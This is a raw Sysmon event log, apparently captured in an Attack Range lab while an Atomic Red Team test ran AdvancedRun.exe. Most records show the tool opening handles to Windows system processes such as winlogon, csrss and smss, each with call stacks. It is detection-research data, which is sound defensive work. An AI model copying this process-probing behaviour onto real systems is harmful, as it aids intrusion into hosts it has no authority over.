17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983774Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983773Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983772Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983771Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983770Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983768Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983766Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983765Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003983764Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983763Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983761Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983760Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983759Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 